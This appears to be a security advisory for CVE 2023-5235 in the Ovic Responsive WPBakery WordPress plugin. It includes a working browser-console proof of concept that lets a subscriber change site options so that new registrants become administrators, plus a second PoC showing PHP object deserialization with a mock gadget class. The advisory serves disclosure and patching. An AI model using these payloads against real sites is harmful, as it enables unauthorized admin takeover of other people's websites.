Ovic Responsive WPBakery < 1.2.9 – Subscriber+ Option Update | CVE 2023-5235

Description

The plugin does not limit which options can be updated via some of its AJAX actions, which may allow attackers with a subscriber+ account to update blog options, such as 'users_can_register' and 'default_role'. It also unserializes user input in the process, which may lead to Object Injection attacks.

Proof of Concept

1) Log onto the site as a subscriber
2) Run the following in your browser's console:
```
fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    credentials: "include",
	mode: 'cors',
    headers: {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    },
    body: 'action=ovic_vc_import_options&data=eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w'
})
.then(response => response.text()) 
.then(data => {
    console.log(data);
})
```

3) Log out, and visit /wp-login.php to create a new account, which will automatically be given the `administrator` role.
---
After version 1.2.8, the following POC demonstrates a remaining Admin+ Object Deserialization vulnerability:

1) Ensure that the WP Bakery plugin is installed and activated.
2) Put the following code on the server in order to simulate a malicious gadget chain:

class Evil {
        public function __wakeup() : void {
                error_log( "[*] Evil object unserialize! BOOM!" );
                die( "[*] Evil object unserialize! BOOM!");
        }
}

3) Visit the /wp-admin/admin.php?page=ovic-vc-addon page as an admin user.
4) Run the following code in the browser to see the deserialization occur:

fetch(ovic_vc_params.ajaxurl, {
    method: 'POST',
    credentials: "include",
	mode: 'cors',
    headers: {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    },
    body: 'action=ovic_vc_import_options&data=eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo'
})
.then(response => response.text()) 
.then(data => {
    console.log(data);
})